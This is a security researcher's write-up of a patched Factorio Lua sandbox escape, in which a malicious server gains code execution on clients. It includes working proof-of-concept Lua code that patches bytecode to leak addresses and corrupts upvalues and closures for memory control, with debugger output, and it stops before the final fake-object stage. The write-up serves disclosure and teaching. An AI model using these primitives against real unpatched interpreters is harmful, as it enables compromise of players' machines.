Rocket Man

Some months ago I exploited a vulnerability in the Lua implementation of Factorio that allowed a malicious server to obtain arbitrary execution on clients. As the vulnerability has been patched for months already (Factorio versions below 1.1.101 are affected), is time to share the details with the community.

I think this is a very interesting topic, that can serve as an introduction to understand other dynamic languages such as Javascript, where similar ideas are used for exploitation. For this reason, this is an in-depth explaination of the vulnerability, so that it can be used by others as a reference to understand how these attacks work.

In addition to this, at the end of the post you will find a challenge to practice the techniques explained in this post in a gamified environment, directly in your browser.

You can jump directly to the challenge: Your Turn

What is Factorio?

Factorio is a game in which you automate a factory to build a rocket and escape from a planet. Based on their website, they have sold more than 3,500,000 copies of the game , making it a juicy target for security researchers

YouTube video

How is Lua used in the game?

Lua is used in Factorio to implement some game logic and to create mods and custom maps that can be downloaded from in-game or from their website . The modding community is very active, so there are thousands of mods available, some with even more than half a million downloads

Alien Biomes mod

The Alien Biomes mod has 551K downloads

Based on this information, it might seem that the surface of the Lua interpreter in the game is limited to local exploits that require the user to download a malicious mod. That would already be an issue, as compromising one mod (either finding a vulnerability in it / compromising the source) has the potential to reach millions of users, but we are missing a small detail that exposes the lua interpreter to the network, opening the door to more interesting attacks

The more the merrier

On the Factorio wiki there is a very important implementation detail of the multiplayer mode:

Factorio multiplayer code uses deterministic lockstep to synchronize clients. This is a method of synchronizing a game from one computer to another by sending only the user inputs that control that game, rather than networking the state of the objects in the game itself. It means that all player’s games need to simulate every single tick of the game identically. If any computer does something ever-so-slightly different, a desynchronization (desync) occurs. The game includes processes to ensure any issues with network traffic do not cause desyncs.

That means that if one player executes some Lua code, the rest of the players must execute it in order to preserve the syncronization of the game. Failing to do so will result in a desync state, disconnecting the client from the game with an error message, as also seen in the wiki

Desync Error

So we now know that any Lua code we execute is also executed by the rest of players. What are our options to execute lua code? After some research, we end up with two options:

  1. Use the /c command to execute Lua code in a server (if we have permission to do it)
  2. Creating a custom map that contains lua code so it gets executed when a client connects to the server

As both options require privileges on a server, we might as well go for the second path.

As the game also features an in-game server browser, an attacker could make it visible there to atract victims.

Going Deeper

General Exploitation Path

Now that we have a clear path to reach the Lua interpreter from the network, let’s take a quick look at the general exploitation path that we will follow:

  1. We host a Factorio server that is serving a malicious map. This map will contain our exploit as part of the Lua code that defines the scenario of the map
  2. When a client connects to our server, they download the map and execute the Lua code associated with it (as we have seen before, as state is not shared, clients need to execute the Lua code to ensure syncronization between them)
  3. Our payload will leverage weaknesses in the Lua implementation to craft fake objects
  4. These fake objects will allow us to leak/corrupt memory to alter the behaviour of the program
  5. We follow one of the many techniques to gain code execution by leveraging these powerful primitives

A small leak will sink a great ship

As one can imagine, the official Lua interpreter contains modules that allow scripts to interact with the host in multiple common ways, such as opening files, executing commands, getting environment variables… While this might be desirable on normal circumstances, is definitely not okay when executing untrusted code. For this reason, a basic hardening recommendation is to completely disable these modules when compiling Lua for those sensitive environments.

This is the case in Factorio too, where only the following modules are compiled:

  • debug - Provides Access to Debug functionalities
  • math - Interface to standard C Math
  • bit32 - Bitwise operations
  • string - Manipulation of strings
  • table - Manipulation of tables
  • base - Core Functions of Lua, such as print

However, the devil is in the details, and while modules that have names like os with functions like execute are easily recognizable are dangerous, others like load or loadstring that are part of the base module might be seem as benign, while they are arguably the most powerful functions of Lua.

Why are these functions so powerful? Because they allow executing bytecode.

Who controls the Bytecode controls the future

Lua is an interpreted language, but it doesn’t execute the code we write as it is, first, it is compiled. This might be a surprise to some, as it seems to be incompatible with the classic view of an interpreted language. However, details are important, Lua doesn’t compile to machine code, that is, code that your CPU understands. Instead, it compiles into Lua bytecode, which is a representation of the code that can only be executed by the Lua interpreter, making it still an interpreted Language.

Source code is useful for humans, as it is easily readable, but text is hard to work with for computers, so bytecode is a more useful representation for them.

Let’s see this in practice so we get a clearer view of how this works.

If we have the following code:

print("MemoryCorruption")

Lua is going to generate and execute the following bytecode:

All the bytecode snippets in this post were created with luac -l -l <script>. luac is provided together with the Lua interpreter
1	GETTABUP	0 0 -1	; _ENV "print"
2	LOADK	1 -2        ; "MemoryCorruption"
3	CALL	0 2 1	
4	RETURN	0 1	

Without knowing anything about bytecode, we can see that somehow Lua is getting the function print, loading a constant MemoryCorruption, calling print and finally returning.

This bytecode is what gets executed by the interpreter, there are no more conversions or checks. This is why being able to execute bytecode directly is so powerful, because you gain the ability to execute incorrect bytecode that under normal circunstances, the compiler would never generate

For example, what happens if I modify the previous LOADK opcode, that is used to load a constant to use a Out-Of-Bounds index? Does the interpreter prevents me from doing that? Or does it leak memory?

Bytecode Verifier

Aware of the dangers of directly executing bytecode, Lua developers implemented a bytecode verifier in an attempt to protect the interpreter from malicious bytecode. However, it was removed in version 5.2 as it was repeatedly found to be bypassable

Following several bytecode exploits found by the relentless Peter Cawley and others, we are considering dropping the bytecode verifier completely in Lua 5.2. It seems useless to make a promise that we can’t seem to deliver without a much more complicated verifier than the current one, and possibly with the need for costly runtime checks as well.

Our impression is that applications that are open to running arbitrary Lua code provided by the user should avoid accepting precompiled scripts. So we think that adding a flag to load (the Lua function from the base library) to check for and reject precompiled scripts is enough for Lua-based apps to be able to reject precompiled scripts if they want to. We don’t think anything else is needed in the C side, since you can always write you own lua_Reader function to reject precompiled scripts.

At the same time, shedding the bytecode verifier would allow applications that run their own precompiled scripts that are deemed safe to avoid the cost of the bytecode verifier. The checks would be limited to the sanity tests done in lundump.c, which should be enough for flagging accidental file corruption.

All feedback is welcome. Thanks. –lhf 1

Even if the official bytecode verifier was not implemented in Lua 5.2.1, Factorio developers seem to have implemented their own in an attempt to protect the Lua interpreter2. These protections focused primarly in avoiding clearly OOB parameters, like trying to jump outside the code or loading a constant with an index bigger than the constants array

This bytecode verifier had some Off-By-One issues, as some opcodes can be a little confusing. For example, JMP 0 does not really make sense, as it would basically make an infinite loop, so the jump opcode is offset by one by default. This wasn’t taken into account in the verifier, so it was possible to jump outside the code block.

This was an issue by itself as there exists the possiblity that the constants are allocated just after the code chunk, so an attacker could store bytecode in the constants section to bypass the checks and then jump to it with the off by one. As Lua ignores malformed instructions, the metadata of the chunk would be ignored in most cases, resulting in execution of the constants as bytecode.

Building Blocks

In interpreted languages such as Javascript and Lua, an incredibly powerful primitive is the ability to create fake objects. This is because it allow us to leverage the full power of the interpreter in our advantage; Strings can be used to leak arbitrary data, arrays allow to write to arbitrary memory and if the language has a way to call native functions, we can use it to control the execution flow.

In addition to this, exploitation can be as complex as we need, as our exploit can make decisions and calculate values dynamically, because at the end we are still executing Javascript/Lua code.

For these reasons, our goal is to gain the ability to create these fake objects.

To fulfil this goal, we basically need two things:

  • The ability to leak addresses: this will allow to place our fake objects in strings, as we will be able to locate them in memory
  • A way to retrieve an object from an address: if we can retrieve an object from an arbitrary address, we can use the addresses leaked to get fake objects

Leaking Addresses

Normally, leaking addresses in Lua is a feature of the print function:

[MemoryCorruption src] ./lua -e 'function foo() end print(foo)'
function: 0x1673490

However, not only this was removed in Factorio, it also doesn’t leak the address of strings, which we want to use to store our fake objects. That means that we will have to craft our own primitive to leak addresses.

A common way to leak addresses in Lua is by leveraging type confusions between objects.

Introduction to TValues

To understand how a type confusion leads to leaking addresses, we first need to understand how objects internally work in Lua.

As we know, Lua is a dynamic language, so a variable can change its type during runtime:

foo = "A"
print(foo)
-- Output: A
foo = 1
print(foo)
-- Output: 1
foo = print
print(foo)
-- Output: function

However, Lua is written in C, which is a static language, that means that the type of variables is set on stone after compilation. How is possible to build a dynamic language on a static one? Like most things in Computer Science, by adding another abstration layer.

Internally in Lua, objects are represented with the TValue structure

pwndbg> ptype TValue
type = struct lua_TValue {
    Value value_;
    int tt_;
}

Where the tt_ attribute defines the type of the TValue and the Value attribute is used to access the object represented by the TValue.

As we can see, by doing this, Lua can easily implement dynamic types. In Lua, everything is a TValue, so changing the type of a variable just means replacing one TValue with another TValue. When doing operations with the TValues, Lua just has to check the tt_ property to know how to access it and what operations are valid.

Inside the Value union we have the value of a TValue:

pwndbg> ptype /o Value
type = union Value {
/*                     8 */    GCObject *gc;
/*                     8 */    void *p;
/*                     4 */    int b;
/*                     8 */    lua_CFunction f;
/*                     8 */    lua_Number n;
/* total size (bytes):    8 */
}

As we can see, it is basically a space of 8 bytes that is interpreted either as a double or as a pointer to another structure depending on the type of the TValue.

Notice how numbers are an special case. Lua represents all numbers as doubles3, so there is no need to use a pointer to access it, they can be stored inline in the Value union to save space and make access faster, as they have the same size of a pointer.

This detail is KEY to leaking pointers in Lua (and also in V8!). If we can make Lua think our String is a Number, instead of accessing the Value union as a pointer, it will be accessed as a double. That means that the pointer of the string will be used as a double, which might allow us to leak it depending on how is used.

FORLOOP

A common place to confuse the types of objects is in loops 4. If we can make Lua think any object passed as the initial start point of a numeric loop is a number, we could leak its address, as it would be available to us as a variable.

In Lua, loops are implemented by the FORLOOP opcode. This opcode is always preceded by a FORPREP opcode on numeric loops that checks the type of the arguments and prepares the loop.

vmcase(OP_FORPREP,
    const TValue *init = ra;
    const TValue *plimit = ra+1;
    const TValue *pstep = ra+2;
    if (!tonumber(init, ra))
        luaG_runerror(L, LUA_QL("for") " initial value must be a number");
    else if (!tonumber(plimit, ra+1))
        luaG_runerror(L, LUA_QL("for") " limit must be a number");
    else if (!tonumber(pstep, ra+2))
        luaG_runerror(L, LUA_QL("for") " step must be a number");
    setnvalue(ra, luai_numsub(L, nvalue(ra), nvalue(pstep)));
    ci->u.l.savedpc += GETARG_sBx(i);
)

That means that if we try to leak the address of a function with a loop without messing with the bytecode…

foo = function(x)
    for i = x, 100000000000000, 0 do return i end
end

print(foo(foo))

We get an error due to passing a function instead of a number as the for value

./lua: poc.lua:2: 'for' initial value must be a number
stack traceback:
	poc.lua:2: in function 'foo'
	poc.lua:5: in main chunk
	[C]: in ?

However, if we check the code of the FORLOOP opcode, the step parameter type is not checked, and there is even a comment saying that it is fine

vmcase(OP_FORLOOP,
/* not checking ra+2, because I don't see way how to exploit it not being number */
    if (!ttisnumber(ra+1) | !ttisnumber(ra))
        luaG_runerror(L, LUA_QL("for") " bytecode error, control variables need to be numbers");
    lua_Number step = nvalue(ra+2);
    lua_Number idx = luai_numadd(L, nvalue(ra), step); /* increment index */
    lua_Number limit = nvalue(ra+1);
    if (luai_numlt(L, 0, step) ? luai_numle(L, idx, limit)
                                : luai_numle(L, limit, idx)) {
        ci->u.l.savedpc += GETARG_sBx(i);  /* jump back */
        setnvalue(ra, idx);  /* update internal index... */
        setnvalue(ra+3, idx);  /* ...and external index */
    }
)

As step is not type checked, its value will be passed to the nvalue call to get its value

lua_Number step = nvalue(ra+2);

Where nvalue is a macro used to access the number contained in a TValue that represents a number

#define nvalue(o)	check_exp(ttisnumber(o), num_(o))

check_exp is another macro that triggers a Lua assert if the first parameter is not true. As the ttisnumber macro checks if the object passed is a Number, this check seems to prevent us from confusing types on Lua. However, the check_exp macro has to be enabled on compile time to trigger an assert and by default does nothing

/* internal assertions for in-house debugging */
#if defined(lua_assert)
#define check_exp(c,e)		(lua_assert(c), (e))
#else
#define lua_assert(c)		((void)0)
#define check_exp(c,e)		(e)
#endif

As this assertion is disabled, type is not checked and the num_ macro is executed with any object we pass to the function, leaking the value of the Value attribute of the TValue passed (which can be a pointer)

#define val_(o)		((o)->value_)
#define num_(o)		(val_(o).n)

All this means that if we craft our own bytecode, we could leverage the type confusion and leak addresses. This is an example of why the ability to execute our own bytecode is so powerful, it allows us to create circunstances that the compiler would never generate from source code.

Let’s craft our own bytecode to exploit this vulnerability. The bytecode generated by the compiler is the following, notice how the FORLOOP opcode is preceded by a FORPREP opcode.

1	[2]	LOADK    	1 -1	; 0
2	[2]	LOADK    	2 -2	; 1000000000000
3	[2]	MOVE     	3 0
4	[2]	FORPREP  	1 1	; to 6
5	[2]	RETURN   	4 2
6	[2]	FORLOOP  	1 -2	; to 5
7	[3]	RETURN   	0 1

We can patch this opcode to remove the type check and leverage the type confusion in FORLOOP, as there is no check in the bytecode verifier that prevents us from removing it

	1	[2]	LOADK    	1 -1	; 0
	2	[2]	LOADK    	2 -2	; 1000000000000
	3	[2]	MOVE     	3 0
	4	[2]	JMP      	0 1	; to 6
	5	[2]	RETURN   	4 2
	6	[2]	FORLOOP  	1 -2	; to 5
	7	[3]	RETURN   	0 1

With this change we can start leaking addresses. Let’s try to leak the address of a string

asnum = loadstring(string.dump(function(x)
    for i = 0, 1000000000000, x do return i end
end):gsub("\x61\0\0\x80", "\x17\0\0\128"))

foo = "Memory Corruption"

print(asnum(foo))

Running this code gives us an odd double value

[MemoryCorruption src] ./lua poc.lua 
2.1944577826691e-317

As we have seen before, all numbers in Lua are represented as doubles3, so when we try to leak a pointer, Lua thinks the value is also double. However, pointers are not doubles, so they are not encoded as such, leading to odd values when used as doubles.

As we already know that Lua doesn’t have integers, we need a way to properly encode the pointers as doubles to obtain the real value. And for that, we first need to understand what are floating-point numbers.

IEEE 754 double-precision

Doubles are represented using the IEEE 754 binary64 format. In this format, they are formed by three parts:

  • Sign: 1 bit
  • Exponent: 11 bits
  • Mantissa: 52 bits

Double Representation

Sign: 1 bit. Exponent: 11 bits. Mantissa: 52 bits

So they are basically 64 bits of data, nothing makes them intrinsically different from an integer, the only difference is the way bits get interpreted. We already knew this, as this is what allows them to be stored inline in the Value union

This also means that in Python we can just pack it to bytes an then unpack it as a integer to obtain the pointer we leaked, as they have the same size.

This only works in our case as the leak is a “fake” floating-point number. Doing this for real floating-point numbers will lead to errors
import struct

# Convert the floating-point number to a number
double_bytes = struct.pack('<d', 2.1944577826691e-317)
number = struct.unpack("<q", double_bytes)[0]

print(hex(number)) # Output: 0x43c620

Unfortunately, with Lua things gets complicated. Lua 5.2 doesn’t have the ability to pack/unpack, and more important, it doesn’t even have integers.

That means that as we can’t represent our leak as a real integer, beyond 53 bits we will encounter precision limitations when trying to represent integers, as from that point, integers no longer fit in the mantissa and only some numbers will not suffer from precision limitations 5. But there is also a bright side, we have 53 bits in which there is no difference between the precision of an integer and a double.

As 53 bits ought to be enough for anyone are enough to leak adresses, we just need a way to convert fake doubles to properly encoded doubles.

From “Doubles” to Doubles; The Painful Way

If we had a way to access the bits of the double, the conversion would be easy. However, we can’t use bitwise operations, because what does it even mean to do a bitwise operation on a double? We need to find a different way to obtain the bits of a float

The most comprensible way that I know is by using the string.format method with the %a format string.

This provides us a string containing the double in hexadecimal. We will specifically use %.13a to force a mantissa of 13 hex characters (52 bits) to be printed so we don’t have to pad it ourselves.

-- We use the value we leaked before as an example
local double_as_string = string.format("%.13a", 2.1944577826691e-317)
print(double_as_string)

This provides us with the string: 0x0.000000043c620p-1022, which corresponds to: 6

  • First part: indicates if the double is denormalized (0x0 if denormalized).
  • Second part: mantissa hex encoded followed by p character
  • Third part: exponent part decimal encoded

Hex Encoding of Double

Number is denormalized. Mantissa is 000000043c620p. Exponent is -1022

This uncovers a new interesting fact about floating-point numbers. As we know from the output of the Python code, our leaked value is 0x43c620. Which as we can see, is basically the value of the mantissa. But what about the exponent? With our current knowledge of floating-point numbers, we can’t explain an exponent of -1022. As far as we know, it should be zero, what is happening here?

Exponent Bias

This discrepancy occurs due to the way floating-point numbers are encoded. The exponent of floating-point numbers use biased representation7, which is a way to encode signed numbers by encoding the offset from a number known as the bias: exponent = encoded_value - bias

In the case of doubles, this bias is 1023, which means that the exponent will take values between -1022 and 1023

  • encoded_exp = 00000101010 = 42 -> exponent = 42 - 1023 = -981
  • encoded_exp = 11111010000 = 2000 -> exponent = 2000 - 1023 = 977

As you might already notice, if the exponent has 11 bits, that means that it can represent 2**11 = 2048 possible values, but we are missing two, when they are all 0 and when they are all 1. This is because they have an especial meaning:

  • encoded_exp = 00000000000 means that the number is denormalized (or a signed zero if the mantissa is 0)
  • encoded_exp = 11111111111 means Inf (if mantissa 0) or NaN (if mantissa is not zero)

This explains why our pointer has an ood value. Lua thinks it is a denormalized number as the exponent was zero while the mantissa was not zero.

Denormalized numbers are basically very small numbers. For a double, they start at values smaller than 2**-1022 8

print(string.format("%.13a", 2^-1022))
-- Output: 0x1.0000000000000p-1022 (Value different from 0x0 means normal number)
print(string.format("%.13a", 2^-1023))
-- Output: 0x0.8000000000000p-1022 (0x0 means denormalized number)

This is also why the exponent of our leaked value was -1022. As our number was denormalized and it was indicated by the first part of the output, the exponent is no longer useful for us (as it only indicated that is denormalized, which we already knew), so it seems to be fixed at -1022, the smallest representable exponent.

Are we double yet?

There are basically two cases we need to handle:

  • Denormalized Numbers: the integer value fits in the mantissa, we decode the mantissa to obtain the correct double.
  • Normal numbers: the value does not fit in the mantissa. The best we can do to recover the original value is to calculate the number as (exponent + 1023) * 2^52 + mantissa (if the number is not representable as a double, we lose data doing this)
If we really wanted to handle any number without losing data, we could store the value in two doubles and make functions to operate with them as an integer

Here is a Lua implementation of this idea:

function double_to_number(double)
    -- Force representation of mantissa with 13 bytes of precision
    local double_as_string = string.format("%.13a", double)
    local denormalized, mantissa, exponent = string.match(double_as_string,
      "-?0x([a-fx0-9]*).([a-f0-9]*)p?(-?[0-9]*)")

    -- Convert to number
    denormalized = tonumber(denormalized, 16)
    mantissa = tonumber(mantissa, 16)
    exponent = tonumber(exponent)

    if denormalized == 0 then
        -- If denormalized, it means that the leaked value had zeros
        -- in the position of the exponent
        -- That means the number fits the mantissa, 
        -- so we don't have to do anything with our new double to represent it
        real_exponent = 0 
    else
        -- In this case, the leaked value had a value different
        -- value from zero in the exponent.
        -- That means the number does NOT fit the mantissa.
        -- We need to calculate the real value and then
        -- try to represent it as a double
        real_exponent = (exponent + 1023) * 2^52 -- Shift 52 bits (size of mantissa)
    end
    
    return real_exponent + mantissa
end

Which we can finally add to our FORLOOP code to transform the leaked pointer

foo = "Memory Corruption"

leak = asnum(foo)
print("Leak: " .. leak)
print(string.format("Pointer: 0x%x", double_to_number(leak)))
-- Output:
-- Leak: 2.1965605260578e-317
-- Pointer: 0x43d6c0

We can then check in GDB that 0x43d6c0 is in fact the correct pointer:

pwndbg> x/20s 0x43d6c0
0x43d6c0:	"\340nC"
0x43d6c4:	""
0x43d6c5:	""
0x43d6c6:	""
0x43d6c7:	""
0x43d6c8:	"\004\002"
0x43d6cb:	""
0x43d6cc:	"\222\311X+\021"
0x43d6d2:	""
0x43d6d3:	""
0x43d6d4:	""
0x43d6d5:	""
0x43d6d6:	""
0x43d6d7:	""
0x43d6d8:	"Memory Corruption"
0x43d6ea:	""
0x43d6eb:	""
0x43d6ec:	""
0x43d6ed:	""
0x43d6ee:	""

Our string is not exactly at the address leaked as we leaked the address of a TString structure, the internal representation of strings in Lua

type = union TString {
/*                     8 */    L_Umaxalign dummy;
/*                    24 */    struct {
/*      0      |       8 */        GCObject *next;
/*      8      |       1 */        lu_byte tt;
/*      9      |       1 */        lu_byte marked;
/*     10      |       1 */        lu_byte extra;
/* XXX  1-byte hole      */
/*     12      |       4 */        unsigned int hash;
/*     16      |       8 */        size_t len;
      /* total size (bytes):   24 */
     } tsv;

    /* total size (bytes):   24 */
}

The real string is after this header, that is, 24 bytes after the leaked pointer:

pwndbg> x/s 0x43d6c0+24
0x43d6d8:	"Memory Corruption"

Confusing Upvalues

Now that we have a way to leak addresses, we need a primitive that allows us to retrieve fake objects. To do this, we first need to understand how upvalues and Closures work in Lua.

What are Upvalues?

Upvalues are a way to access variables outside the scope of the current function. Consider the following example that calculates the Fibonacci secuence:

function fibonacci(n)
	local a = 1
	local b = 1

	function nextValue()
     -- 'a' and 'b' are upvalues, as they are defined in the outer function
     return a + b
	end

	for i=0, n do
		tmp = a
		a = nextValue()
		b = tmp
	end
	return b
end

The nextValue function accesses both a and b variables even if they are outside its scope, that is because both variables are defined as upvalues. We can see that this is true by taking a look at its bytecode:

upvalues (2) for nextValue:
	0	a	1	1
	1	b	1	2

The format of the upvalues section is the following:

  1. Index: position in the upvalues array of the function
  2. Name: name of the upval
  3. In Stack: indicates if the upval is located in the stack (one if located in the stack)
  4. Stack Index: offset of the upval from the base address of the stack

So we know that both a and b are upvalues located in the stack, with a located at base + 1 and b at base + 2

The Gift that Keeps on Giving

As you might start thinking, we control the bytecode that gets loaded, and upvalues are defined in the bytecode, what happens if we modify the index of an upvalue to point to a different offset of the stack?

Let’s try it, first we define a function that has three upvalues

function()
    local foo
    local bar
    local target
    (function()
      print(foo)
      print(bar)
      print(target)
    end)()
end

If we execute the code without any modification to the bytecode, we get nil as the output, as the upvalues haven’t been assigned any value yet

[MemoryCorruption src]$ ./lua poc.lua 
nil
nil
nil

Now we are going to manipulate the index of the target upval. To do this, we need to know its current position:

The _ENV upvalue is used to get the address of the print function, and is not important for our purposes
upvalues (4) for 0xd587a0:
	0	_ENV	0	0
	1	foo	1	0
	2	bar	1	1
	3	target	1	2

As it is currently 2, we are going to increase it to 3. We can do that with this code:

poc = string.dump(function()
    local foo
    local bar
    local target
    (function()
      print(foo)
      print(bar)
      print(target)
    end)()
end)
-- Modify upvalue index of target to be idx + 1
poc = poc:gsub("(\x00\x00\x01\x00\x01\x01\x01)\x02", "%1\x03", 1)
poc = load(poc)
poc()

Here we dump the bytecode of the function with string.dump and then modify the index of the last upvalue with a substitution. We use "(\x00\x00\x01\x00\x01\x01\x01)\x02" as the pattern because each upvalue has one byte to indicate if it is located in the stack and another to indicate the index, making it unique enough for our purpose.

Execution of the manipulated bytecode reveals something interesting:

[MemoryCorruption src]$ ./lua poc.lua 
nil
nil
LClosure: 0x7a6d00
An unmodified version of Lua will return function instead of LClosure, as the default print function considers closures functions

Instead of nil, we got an LClosure, but what is an LClosure? To understand it, we need to know how functions work in Lua

Closures and Prototypes

Prototypes are created when loading bytecode or when parsing the source code of a Lua script. As such, we could say that prototypes are the real functions, as they contain all the information we would commonly associate with a function, like its bytecode, the start and end line of source code where it was defined, constants used…

They act kinda as a template for functions

typedef struct Proto {
  CommonHeader;
  TValue *k;  /* constants used by the function */
  Instruction *code;
  struct Proto **p;  /* functions defined inside the function */
  int *lineinfo;  /* map from opcodes to source lines (debug information) */
  LocVar *locvars;  /* information about local variables (debug information) */
  Upvaldesc *upvalues;  /* upvalue information */
  union Closure *cache;  /* last created closure with this prototype */
  TString  *source;  /* used for debug information */
  int sizeupvalues;  /* size of 'upvalues' */
  int sizek;  /* size of `k' */
  int sizecode;
  int sizelineinfo;
  int sizep;  /* size of `p' */
  int sizelocvars;
  int linedefined;
  int lastlinedefined;
  GCObject *gclist;
  lu_byte numparams;  /* number of fixed parameters */
  lu_byte is_vararg;
  lu_byte maxstacksize;  /* maximum stack used by this function */
} Proto;

On the other hand, Closures are created during execution of the Lua script and associate a Prototype with its Upvalues.

typedef struct LClosure {
  ClosureHeader;
  struct Proto *p; /* Function associated with the LClosure */
  UpVal *upvals[1];  /* list of upvalues */
} LClosure;

The existence of Closures is what allows Lua to implement upvalues, as they abstract a function from its upvals. This is important as the same function can have different upvals on each call

We can see this mechanism in work with a function that returns a counter:

function createCounter()
  -- On each call, a new local variable is created
  local count = 0
  return function ()
          -- Count is an upval of this function
          count = count + 1
          return count
        end
end

first_counter = createCounter()
second_counter = createCounter()
-- Increase the first counter
print("Counter 1: " .. first_counter())
-- Increase the second counter
print("Counter 2: " .. second_counter())

In this code, the createCounter function returns a new function that can be used to increase an upvalue of the createCounter function. As a new count variable is created on each call, the function will return a different LCLosure when called. The same prototype will be used, as they are the same funcion, but a different upval will be associated with it 9

Wait, is all TValues?

By modifying the index of the upvalue, we got a reference to the current function closure, that is because LClosures are pushed to the stack on creation and just before upvalues are asigned to it.

/*
** create a new Lua closure, push it in the stack, and initialize
** its upvalues.
*/
static void pushclosure (lua_State *L, Proto *p, UpVal **encup, StkId base,
                         StkId ra) {
  int nup = p->sizeupvalues;
  Upvaldesc *uv = p->upvalues;
  int i;
  Closure *ncl = luaF_newLclosure(L, nup);
  ncl->l.p = p;
  setclLvalue(L, ra, ncl);  /* anchor new closure in stack */
  for (i = 0; i < nup; i++) {  /* fill in its upvalues */
    if (uv[i].instack)  /* upvalue refers to local variable? */
      ncl->l.upvals[i] = luaF_findupval(L, base + uv[i].idx);
    else  /* get upvalue from enclosing function */
      ncl->l.upvals[i] = encup[uv[i].idx];
  }
  luaC_barrierproto(L, p, ncl);
  p->cache = ncl;  /* save it on cache for reuse */
}

The position of the LClosure in the stack depends on the opcode CLOSURE, which as the name indicates, is reponsible for the creation of closures in Lua and is defined as:

R(A) := closure(KPROTO[Bx])

This basically means to create a new Closure based on the prototype at position Bx of the current function prototype array of prototypes (function prototypes are stored in the prototype of the function that defined it), and store it at position R(A), which is a macro that means base + A, so at an offset from the current function stack (which seems to always be just after the local variables).

This explains why when we modified the index of the last upval we got the LClosure of the function

function (4 instructions at 0x225b540)
0 params, 4 slots, 1 upvalue, 3 locals, 0 constants, 1 function
	1	[19]	LOADNIL  	0 2
	2	[28]	CLOSURE  	3 0	; 0x225bc80
	3	[22]	CALL     	3 1 1
	4	[29]	RETURN   	0 1
constants (0) for 0x225b540:
locals (3) for 0x225b540:
	0	foo	2	5
	1	bar	2	5
	2	target	2	5
upvalues (1) for 0x225b540:
	0	_ENV	0	0

As our function had three locals, the CLOSURE opcode has 3 as the A parameter, meaning that the LClosure is stored at base + 3. When we modified the last upval to point to the index 3, we got the TValue stored at base + 3, that is, the LClosure.

As closures are first class citizens in Lua, they are also a TValue, so they are no more especial than any other variable.

TOCTOU: Type of Check != Type of Use

We just learned that Closures are like any other variable in Lua. This arises a question, what prevents a user from calling a variable like a string as a function and crash Lua?

The answer, as you can imagine, is a type check when trying to call a TValue

int luaD_precall (lua_State *L, StkId func, int nresults) {
  lua_CFunction f;
  CallInfo *ci;
  int n;  /* number of arguments (Lua) or returns (C) */
  ptrdiff_t funcr = savestack(L, func);
  switch (ttype(func)) {
    case LUA_TLCF:  /* light C function */
      f = fvalue(func);
      goto Cfunc;
    case LUA_TCCL: {  /* C closure */
      /* Redacted */
      return 1;
    }
    case LUA_TLCL: {  /* Lua function: prepare its call */
      /* Redacted */
      return 0;
    }
    default: {  /* not a function */
      func = tryfuncTM(L, func);  /* retry with 'function' tag method */
      return luaD_precall(L, func, nresults);  /* now it must be a function */
    }
  }
}

This seems like a banal question, but it has implicit consequences, if the type of the TValue was checked before being able to call it, as it makes sense to do, why would they check the type during execution of the function?

What happens if we replace the LClosure with other type of TValue? Are there type checks to prevent this? Let’s experiment with this idea and replace the LClosure with a String

poc = string.dump(function()
    local foo
    local bar
    local target
    (function()
      print(foo)
      print(bar)
      print(target)
      target = "AAAAAAAAAAAAAAAA" -- Replace LClosure with String
      print(target)
    end)()
end)
-- Modify upvalue index of target to be idx + 1
poc = poc:gsub("(\x00\x00\x01\x00\x01\x01\x01)\x02", "%1\x03", 1)
poc = load(poc)
poc()

Not much seems to happen:

[MemoryCorruption src]$ ./lua ~/Downloads/lua-5.2.1/src/poc.lua 
nil
nil
LClosure: 0x1c57e20
AAAAAAAAAAAAAAAA

Why is that? As we are not calling any other function after overwritting the LClosure, its value is not being used.

But what happens if we corrupt the previous LClosure? How does that affect the execution when Lua returns to the function? Let’s see it

poc = string.dump(function()
    local foo
    local bar
    local target
    (function() -- [1] target points to this function LClosure
      (function()
        print(foo)
        print(bar)
        print(target)
        -- [2] The inner function overwrites the outer function LClosure
        target = "AAAAAAAAAAAAAAAA"
        -- [3] Lua returns to the corrupted LClosure
      end)()
    end)()
end)
-- Modify upvalue index of target to be idx + 1
poc = poc:gsub("(\x00\x00\x01\x00\x01\x01\x01)\x02", "%1\x03", 1)
poc = load(poc)
poc()

This time the inner function is overwritting the LClosure of the outer function instead of modiying their own LClosure

[MemoryCorruption src]$ ./lua poc.lua 
nil
nil
LClosure: 0x21b1130
Segmentation fault (core dumped)

We can see in GDB that the crash happens because Lua is trying to use our TValue as a LClosure in the change of frame code

──[ REGISTERS ]
*RAX  0x4141414141414141 ('AAAAAAAA')
──[ DISASM ]
 ► 0x419d17 <luaV_execute+56>    mov    rax, qword ptr [rax + 0x10]
──[ SOURCE ]
In file: lua-5.2.1/src/lvm.c
   604   TValue *k;
   605   StkId base;
   606  newframe:  /* reentry point when frame changes (call/return) */
   607   lua_assert(ci == L->ci);
   608   cl = clLvalue(ci->func);
 ► 609   k = cl->p->k;
   610   base = ci->u.l.base;
   611   /* main loop of interpreter */
   612   for (;;) {
   613     Instruction i = *(ci->u.l.savedpc++);
   614     StkId ra;

These are great news, as now the cl variable, that points to the current LClosure in execution, is pointing to our TString and not to the real LClosure.

This is possible because the type check in the return opcode is not enforced. Instead of forcing a type check, like in the luaD_precall function before a call, the lua_assert macro is used, and as we learned before, it does nothing by default

vmcasenb(OP_RETURN,
  int b = GETARG_B(i);
  if (b != 0) L->top = ra+b-1;
  if (cl->p->sizep > 0) luaF_close(L, base);
  b = luaD_poscall(L, ra);
  if (!(ci->callstatus & CIST_REENTRY))  /* 'ci' still the called one */
    return;  /* external invocation: return */
  else {  /* invocation via reentry: continue execution */
    ci = L->ci;
    if (b) L->top = ci->top;
    // This type check would prevent this type confusion,
    // but is disabled by default
    lua_assert(isLua(ci));
    lua_assert(GET_OPCODE(*((ci)->u.l.savedpc - 1)) == OP_CALL);
    goto newframe;  /* restart luaV_execute over new Lua function */
  }
)

To understand how we can leverage this, we first need to know what attributes we are in control of when we confuse a TString with a LClosure

Bytes LClosure TString
0-7 GCObject *next GCObject *next
8 lu_byte tt lu_byte tt
9 lu_byte marked lu_byte marked
10 lu_byte nupvalues lu_byte extra
11-15 Padding Padding + unsigned int hash
16-23 GCObject *gclist size_t len
24-31 Proto *p start of user content
32-40 Upval **upval rest of string

As we can see, the type confusion gives us total control of both the Proto and Upval pointers, as the user content of a string is stored in those offsets.

This is important because we gain control over the pointer to the function prototype and the array of upvalues of the current frame. If we point these pointers to an area of memory we control, for example, another string, we could create fake objects, the most powerful primitive in a dynamic language.

Creating Fake Objects

